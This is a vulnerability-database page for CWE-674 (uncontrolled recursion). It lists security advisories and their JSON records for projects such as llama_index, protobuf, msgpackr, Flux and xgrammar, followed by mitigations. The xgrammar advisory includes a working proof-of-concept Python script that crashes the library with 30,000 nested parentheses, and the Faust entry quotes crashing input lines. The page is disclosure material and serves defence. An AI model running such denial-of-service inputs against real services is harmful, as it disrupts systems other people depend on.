Common Weakness Enumeration

CWE-674

Allowed-with-Review

Uncontrolled Recursion

Abstraction: Class · Status: Draft

The product does not properly control the amount of recursion that takes place, consuming excessive resources, such as allocated memory or the program stack.

616 vulnerabilities reference this CWE, most recent first.

GHSA-7C85-87CP-MR6G

Vulnerability from github – Published: 2025-05-10 15:30 – Updated: 2025-10-15 16:12
VLAI
Summary
LlamaIndex Vulnerable to Denial of Service (DoS)
Details

A Denial of Service (DoS) vulnerability has been identified in the KnowledgeBaseWebReader class of the run-llama/llama_index project, affecting version ~ latest(v0.12.15). The vulnerability arises due to inappropriate secure coding measures, specifically the lack of proper implementation of the max_depth parameter in the get_article_urls function. This allows an attacker to exhaust Python's recursion limit through repeated function calls, leading to resource consumption and ultimately crashing the Python process.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "llama-index"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.12.15"
            },
            {
              "fixed": "0.12.21"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-1752"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400",
      "CWE-674"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-05-12T20:16:19Z",
    "nvd_published_at": "2025-05-10T14:15:32Z",
    "severity": "HIGH"
  },
  "details": "A Denial of Service (DoS) vulnerability has been identified in the KnowledgeBaseWebReader class of the run-llama/llama_index project, affecting version ~ latest(v0.12.15). The vulnerability arises due to inappropriate secure coding measures, specifically the lack of proper implementation of the max_depth parameter in the get_article_urls function. This allows an attacker to exhaust Python\u0027s recursion limit through repeated function calls, leading to resource consumption and ultimately crashing the Python process.",
  "id": "GHSA-7c85-87cp-mr6g",
  "modified": "2025-10-15T16:12:12Z",
  "published": "2025-05-10T15:30:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1752"
    },
    {
      "type": "WEB",
      "url": "https://github.com/run-llama/llama_index/commit/3c65db2947271de3bd1927dc66a044da385de4da"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/run-llama/llama_index"
    },
    {
      "type": "WEB",
      "url": "https://huntr.com/bounties/cd7b9082-7d75-42e4-84f5-dbee23cbc467"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "LlamaIndex Vulnerable to Denial of Service (DoS)"
}

GHSA-7GCJ-M465-HXG8

Vulnerability from github – Published: 2025-08-06 15:31 – Updated: 2025-08-06 15:31
VLAI
Details

NVIDIA Triton Inference Server for Windows and Linux contains a vulnerability where an attacker could cause uncontrolled recursion through a specially crafted input. A successful exploit of this vulnerability might lead to denial of service.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-23325"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-08-06T13:15:40Z",
    "severity": "HIGH"
  },
  "details": "NVIDIA Triton Inference Server for Windows and Linux contains a vulnerability where an attacker could cause uncontrolled recursion through a specially crafted input. A successful exploit of this vulnerability might lead to denial of service.",
  "id": "GHSA-7gcj-m465-hxg8",
  "modified": "2025-08-06T15:31:25Z",
  "published": "2025-08-06T15:31:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-23325"
    },
    {
      "type": "WEB",
      "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5687"
    },
    {
      "type": "WEB",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-23325"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7GCM-G887-7QV7

Vulnerability from github – Published: 2026-01-23 15:31 – Updated: 2026-02-05 15:47
VLAI
Summary
protobuf affected by a JSON recursion depth bypass
Details

A denial-of-service (DoS) vulnerability exists in google.protobuf.json_format.ParseDict() in Python, where the max_recursion_depth limit can be bypassed when parsing nested google.protobuf.Any messages.

Due to missing recursion depth accounting inside the internal Any-handling logic, an attacker can supply deeply nested Any structures that bypass the intended recursion limit, eventually exhausting Python’s recursion stack and causing a RecursionError.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 6.33.4"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "protobuf"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.30.0rc1"
            },
            {
              "fixed": "6.33.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "protobuf"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.29.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-0994"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-23T16:56:33Z",
    "nvd_published_at": "2026-01-23T15:16:06Z",
    "severity": "HIGH"
  },
  "details": "A denial-of-service (DoS) vulnerability exists in google.protobuf.json_format.ParseDict() in Python, where the max_recursion_depth limit can be bypassed when parsing nested google.protobuf.Any messages.\n\nDue to missing recursion depth accounting inside the internal Any-handling logic, an attacker can supply deeply nested Any structures that bypass the intended recursion limit, eventually exhausting Python\u2019s recursion stack and causing a RecursionError.",
  "id": "GHSA-7gcm-g887-7qv7",
  "modified": "2026-02-05T15:47:43Z",
  "published": "2026-01-23T15:31:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0994"
    },
    {
      "type": "WEB",
      "url": "https://github.com/protocolbuffers/protobuf/issues/25070"
    },
    {
      "type": "WEB",
      "url": "https://github.com/protocolbuffers/protobuf/pull/25239"
    },
    {
      "type": "WEB",
      "url": "https://github.com/protocolbuffers/protobuf/commit/5ebddcb1bcbe51d1fe323baa145e85f4f23128cf"
    },
    {
      "type": "WEB",
      "url": "https://github.com/protocolbuffers/protobuf/commit/d2b001626d137c62dfee6c88c87324102531868b"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/protocolbuffers/protobuf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L",
      "type": "CVSS_V4"
    }
  ],
  "summary": "protobuf affected by a JSON recursion depth bypass"
}

GHSA-7HPJ-7HHX-2FGX

Vulnerability from github – Published: 2023-12-28 21:16 – Updated: 2024-01-10 18:34
VLAI
Summary
msgpackr's conversion of property names to strings can trigger infinite recursion
Details

Impact

When decoding user supplied MessagePack messages, users can trigger stuck threads by crafting messages that keep the decoder stuck in a loop.

Patches

The fix is available in v1.10.1

Workarounds

Exploits seem to require structured cloning, replacing the 0x70 extension with your own (that throws an error or does something other than recursive referencing) should mitigate the issue.

References

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "msgpackr"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-52079"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-12-28T21:16:20Z",
    "nvd_published_at": "2023-12-28T16:16:01Z",
    "severity": "HIGH"
  },
  "details": "### Impact\nWhen decoding user supplied MessagePack messages, users can trigger stuck threads by crafting messages that keep the decoder stuck in a loop.\n\n### Patches\nThe fix is available in v1.10.1\n\n### Workarounds\nExploits seem to require structured cloning, replacing the 0x70 extension with your own (that throws an error or does something other than recursive referencing) should mitigate the issue.\n\n### References",
  "id": "GHSA-7hpj-7hhx-2fgx",
  "modified": "2024-01-10T18:34:21Z",
  "published": "2023-12-28T21:16:20Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/kriszyp/msgpackr/security/advisories/GHSA-7hpj-7hhx-2fgx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52079"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kriszyp/msgpackr/commit/18f44f8800e2261341cdf489d1ba1e35a0133602"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/kriszyp/msgpackr"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "msgpackr\u0027s conversion of property names to strings can trigger infinite recursion"
}

GHSA-7HQX-W6MQ-G592

Vulnerability from github – Published: 2022-05-24 16:53 – Updated: 2024-02-03 03:30
VLAI
Details

check_input_term in sound/usb/mixer.c in the Linux kernel through 5.2.9 mishandles recursion, leading to kernel stack exhaustion.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-15118"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-08-16T14:15:00Z",
    "severity": "MODERATE"
  },
  "details": "check_input_term in sound/usb/mixer.c in the Linux kernel through 5.2.9 mishandles recursion, leading to kernel stack exhaustion.",
  "id": "GHSA-7hqx-w6mq-g592",
  "modified": "2024-02-03T03:30:26Z",
  "published": "2022-05-24T16:53:50Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-15118"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/pub/scm/linux/kernel/git/tiwai/sound.git/commit/?id=19bce474c45be69a284ecee660aa12d8f1e88f18"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2019/09/msg00025.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2019/10/msg00000.html"
    },
    {
      "type": "WEB",
      "url": "https://lore.kernel.org/lkml/20190815043554.16623-1-benquike%40gmail.com"
    },
    {
      "type": "WEB",
      "url": "https://lore.kernel.org/lkml/20190815043554.16623-1-benquike@gmail.com"
    },
    {
      "type": "WEB",
      "url": "https://seclists.org/bugtraq/2019/Nov/11"
    },
    {
      "type": "WEB",
      "url": "https://seclists.org/bugtraq/2019/Sep/41"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20190905-0002"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/4147-1"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/4162-1"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/4162-2"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/4163-1"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/4163-2"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2019/dsa-4531"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00064.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00066.html"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/155212/Slackware-Security-Advisory-Slackware-14.2-kernel-Updates.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7JJC-F4W2-6G7W

Vulnerability from github – Published: 2024-04-03 00:30 – Updated: 2024-04-03 00:30
VLAI
Details

In Xpdf 4.05 (and earlier), a PDF object loop in the attachments leads to infinite recursion and a stack overflow.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-3248"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-04-02T23:15:55Z",
    "severity": "LOW"
  },
  "details": "In Xpdf 4.05 (and earlier), a PDF object loop in the attachments leads to infinite recursion and a stack overflow.\n",
  "id": "GHSA-7jjc-f4w2-6g7w",
  "modified": "2024-04-03T00:30:56Z",
  "published": "2024-04-03T00:30:56Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3248"
    },
    {
      "type": "WEB",
      "url": "https://forum.xpdfreader.com/viewtopic.php?t=43657"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7PMH-VRWW-25XX

Vulnerability from github – Published: 2024-08-30 18:43 – Updated: 2024-08-30 18:43
VLAI
Summary
freewvs's nested directory structure can interrupt scan
Details

Impact

A directory structure of more than 1000 nested directories can interrupt a freewvs scan due to Python's recursion limit and os.walk(). This can be problematic in a case where an administrator scans the dirs of potentially untrusted users.

Patches

This has been fixed in this commit by limiting the recursion to 500 directories: https://github.com/schokokeksorg/freewvs/commit/83a6b55c0435c69f447488b791555e6078803143

This issue was discovered by Hanno Böck.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "freewvs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.1.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-15101"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-08-30T18:43:23Z",
    "nvd_published_at": "2020-07-14T22:15:00Z",
    "severity": "LOW"
  },
  "details": "### Impact\nA directory structure of more than 1000 nested directories can interrupt a freewvs scan due to Python\u0027s recursion limit and os.walk(). This can be problematic in a case where an administrator scans the dirs of potentially untrusted users.\n\n### Patches\nThis has been fixed in this commit by limiting the recursion to 500 directories:\nhttps://github.com/schokokeksorg/freewvs/commit/83a6b55c0435c69f447488b791555e6078803143\n\nThis issue was discovered by Hanno B\u00f6ck.",
  "id": "GHSA-7pmh-vrww-25xx",
  "modified": "2024-08-30T18:43:23Z",
  "published": "2024-08-30T18:43:23Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/schokokeksorg/freewvs/security/advisories/GHSA-7pmh-vrww-25xx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15101"
    },
    {
      "type": "WEB",
      "url": "https://github.com/schokokeksorg/freewvs/commit/83a6b55c0435c69f447488b791555e6078803143"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/freewvs/PYSEC-2020-233.yaml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/schokokeksorg/freewvs"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "freewvs\u0027s nested directory structure can interrupt scan"
}

GHSA-7PWF-JG34-HXWP

Vulnerability from github – Published: 2022-05-20 16:58 – Updated: 2022-05-20 16:58
VLAI
Summary
Improper path handling in Kustomization files allows for denial of service
Details

The kustomize-controller enables the use of Kustomize’s functionality when applying Kubernetes declarative state onto a cluster. A malicious user can use a specially crafted kustomization.yaml to cause Denial of Service at controller level.

In multi-tenancy deployments this can lead to multiple tenants not being able to apply their Kustomizations until the malicious kustomization.yaml is removed and the controller restarted.

Impact

Within the affected versions, users with write access to a Flux source are able to craft a malicious kustomization.yaml file which causes the controller to enter an endless loop.

Patches

This vulnerability was fixed in kustomize-controller v0.24.0 and included in flux2 v0.29.0 released on 2022-04-20. The changes introduce better handling of Kustomization files blocking references that could lead to endless loops.

Credits

The Flux engineering team found and patched this vulnerability.

For more information

If you have any questions or comments about this advisory please open an issue in the flux2 repository.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/fluxcd/kustomize-controller"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.16.0"
            },
            {
              "fixed": "0.24.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/fluxcd/flux2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.19.0"
            },
            {
              "fixed": "0.29.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-24878"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-05-20T16:58:38Z",
    "nvd_published_at": "2022-05-06T02:15:00Z",
    "severity": "HIGH"
  },
  "details": "The kustomize-controller enables the use of Kustomize\u2019s functionality when applying Kubernetes declarative state onto a cluster. A malicious user can use a specially crafted `kustomization.yaml` to cause Denial of Service at controller level.\n\nIn multi-tenancy deployments this can lead to multiple tenants not being able to apply their Kustomizations until the malicious `kustomization.yaml` is removed and the controller restarted.\n\n### Impact\n\nWithin the affected versions, users with write access to a Flux source are able to craft a malicious `kustomization.yaml` file which causes the controller to enter an endless loop.\n\n### Patches\n\nThis vulnerability was fixed in kustomize-controller v0.24.0 and included in flux2 v0.29.0 released on 2022-04-20. The changes introduce better handling of Kustomization files blocking references that could lead to endless loops.\n\n### Credits\n\nThe Flux engineering team found and patched this vulnerability.\n\n### For more information\n\nIf you have any questions or comments about this advisory please open an issue in the [flux2 repository](http://github.com/fluxcd/flux2).",
  "id": "GHSA-7pwf-jg34-hxwp",
  "modified": "2022-05-20T16:58:38Z",
  "published": "2022-05-20T16:58:38Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/fluxcd/flux2/security/advisories/GHSA-7pwf-jg34-hxwp"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24878"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/fluxcd/flux2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Improper path handling in Kustomization files allows for denial of service"
}

GHSA-7R4M-G29Q-QF8V

Vulnerability from github – Published: 2024-11-11 00:30 – Updated: 2024-11-19 21:31
VLAI
Details

In Faust 2.23.1, an input file with the lines "// r visualisation tCst" and "//process = +: L: abM-^Q;" and "process = route(3333333333333333333,2,1,2,3,1) : *;" leads to stack consumption.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-41737"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-11-10T23:15:04Z",
    "severity": "HIGH"
  },
  "details": "In Faust 2.23.1, an input file with the lines \"// r visualisation tCst\" and \"//process = +: L: abM-^Q;\" and \"process = route(3333333333333333333,2,1,2,3,1) : *;\" leads to stack consumption.",
  "id": "GHSA-7r4m-g29q-qf8v",
  "modified": "2024-11-19T21:31:30Z",
  "published": "2024-11-11T00:30:44Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41737"
    },
    {
      "type": "WEB",
      "url": "https://github.com/grame-cncm/faust/issues/653"
    },
    {
      "type": "WEB",
      "url": "https://github.com/grame-cncm/faust/tree/e682dbeeb7cc0ec9a1fcb6872f53433e454aa233"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7RGV-GQHR-FXG3

Vulnerability from github – Published: 2026-03-05 18:20 – Updated: 2026-03-05 20:42
VLAI
Summary
xgrammar vulnerable to DoS via multi-layer nesting
Details

Summary

The multi-level nested syntax caused a segmentation fault (core dump).

Details

A trigger stack overflow or memory exhaustion was caused by constructing a malicious grammar rule containing 30,000 layers of nested parentheses.

PoC

#!/usr/bin/env python3
"""
XGrammar - Math Expression Generation Example
"""

import xgrammar as xgr
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer, AutoConfig

s = '(' * 30000 + 'a'
grammar = f"root ::= {s}"

def main():
    device = "cuda" if torch.cuda.is_available() else "cpu"
    model_name = "Qwen/Qwen2.5-0.5B-Instruct"

    # Load model
    model = AutoModelForCausalLM.from_pretrained(
        model_name,
        torch_dtype=torch.float16 if device == "cuda" else torch.float32,
        device_map=device
    )
    tokenizer = AutoTokenizer.from_pretrained(model_name)
    config = AutoConfig.from_pretrained(model_name)

    # Math expression grammar
    math_grammar = grammar

    # Setup
    tokenizer_info = xgr.TokenizerInfo.from_huggingface(
        tokenizer,
        vocab_size=config.vocab_size
    )
    compiler = xgr.GrammarCompiler(tokenizer_info)
    compiled_grammar = compiler.compile_grammar(math_grammar)

    # Generate
    prompt = "Math: "
    inputs = tokenizer(prompt, return_tensors="pt").to(device)

    xgr_processor = xgr.contrib.hf.LogitsProcessor(compiled_grammar)

    output_ids = model.generate(
        **inputs,
        max_new_tokens=50,
        logits_processor=[xgr_processor]
    )

    result = tokenizer.decode(
        output_ids[0][len(inputs.input_ids[0]):],
        skip_special_tokens=True
    )

    print(f"Generated expression: {result}")

if __name__ == "__main__":
    main()
> pip show xgrammar
Name: xgrammar
Version: 0.1.31
Summary: Efficient, Flexible and Portable Structured Generation
Home-page: 
Author: MLC Team
Author-email: 
License: Apache 2.0
Location: /home/yuelinwang/.local/lib/python3.10/site-packages
Requires: numpy, pydantic, torch, transformers, triton, typing-extensions
Required-by: 

> python3 1.py 
`torch_dtype` is deprecated! Use `dtype` instead!
Segmentation fault (core dumped)

Impact

DoS

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.1.31"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "xgrammar"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.1.32"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25048"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-05T18:20:08Z",
    "nvd_published_at": "2026-03-05T16:16:15Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nThe multi-level nested syntax caused a segmentation fault (core dump).\n\n\n### Details\n\nA trigger stack overflow or memory exhaustion was caused by constructing a malicious grammar rule containing 30,000 layers of nested parentheses.\n\n### PoC\n\n```\n#!/usr/bin/env python3\n\"\"\"\nXGrammar - Math Expression Generation Example\n\"\"\"\n\nimport xgrammar as xgr\nimport torch\nfrom transformers import AutoModelForCausalLM, AutoTokenizer, AutoConfig\n\ns = \u0027(\u0027 * 30000 + \u0027a\u0027\ngrammar = f\"root ::= {s}\"\n\ndef main():\n    device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n    model_name = \"Qwen/Qwen2.5-0.5B-Instruct\"\n    \n    # Load model\n    model = AutoModelForCausalLM.from_pretrained(\n        model_name,\n        torch_dtype=torch.float16 if device == \"cuda\" else torch.float32,\n        device_map=device\n    )\n    tokenizer = AutoTokenizer.from_pretrained(model_name)\n    config = AutoConfig.from_pretrained(model_name)\n    \n    # Math expression grammar\n    math_grammar = grammar\n    \n    # Setup\n    tokenizer_info = xgr.TokenizerInfo.from_huggingface(\n        tokenizer,\n        vocab_size=config.vocab_size\n    )\n    compiler = xgr.GrammarCompiler(tokenizer_info)\n    compiled_grammar = compiler.compile_grammar(math_grammar)\n    \n    # Generate\n    prompt = \"Math: \"\n    inputs = tokenizer(prompt, return_tensors=\"pt\").to(device)\n    \n    xgr_processor = xgr.contrib.hf.LogitsProcessor(compiled_grammar)\n    \n    output_ids = model.generate(\n        **inputs,\n        max_new_tokens=50,\n        logits_processor=[xgr_processor]\n    )\n    \n    result = tokenizer.decode(\n        output_ids[0][len(inputs.input_ids[0]):],\n        skip_special_tokens=True\n    )\n    \n    print(f\"Generated expression: {result}\")\n\nif __name__ == \"__main__\":\n    main()\n```\n\n\n\n```\n\u003e pip show xgrammar\nName: xgrammar\nVersion: 0.1.31\nSummary: Efficient, Flexible and Portable Structured Generation\nHome-page: \nAuthor: MLC Team\nAuthor-email: \nLicense: Apache 2.0\nLocation: /home/yuelinwang/.local/lib/python3.10/site-packages\nRequires: numpy, pydantic, torch, transformers, triton, typing-extensions\nRequired-by: \n\n\u003e python3 1.py \n`torch_dtype` is deprecated! Use `dtype` instead!\nSegmentation fault (core dumped)\n```\n\n\n### Impact\n\nDoS",
  "id": "GHSA-7rgv-gqhr-fxg3",
  "modified": "2026-03-05T20:42:15Z",
  "published": "2026-03-05T18:20:08Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mlc-ai/xgrammar/security/advisories/GHSA-7rgv-gqhr-fxg3"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25048"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mlc-ai/xgrammar"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mlc-ai/xgrammar/releases/tag/v0.1.32"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "xgrammar vulnerable to DoS via multi-layer nesting"
}

Mitigation
Implementation

Ensure that an end condition will be reached under all logic conditions. The end condition may include checking against the depth of recursion and exiting with an error if the recursion goes too deep. The complexity of the end condition contributes to the effectiveness of this action.

Mitigation
Implementation

Increase the stack size.

CAPEC-230: Serialized Data with Nested Payloads

Applications often need to transform data in and out of a data format (e.g., XML and YAML) by using a parser. It may be possible for an adversary to inject data that may have an adverse effect on the parser when it is being processed. Many data format languages allow the definition of macro-like structures that can be used to simplify the creation of complex structures. By nesting these structures, causing the data to be repeatedly substituted, an adversary can cause the parser to consume more resources while processing, causing excessive memory consumption and CPU utilization.

CAPEC-231: Oversized Serialized Data Payloads

An adversary injects oversized serialized data payloads into a parser during data processing to produce adverse effects upon the parser such as exhausting system resources and arbitrary code execution.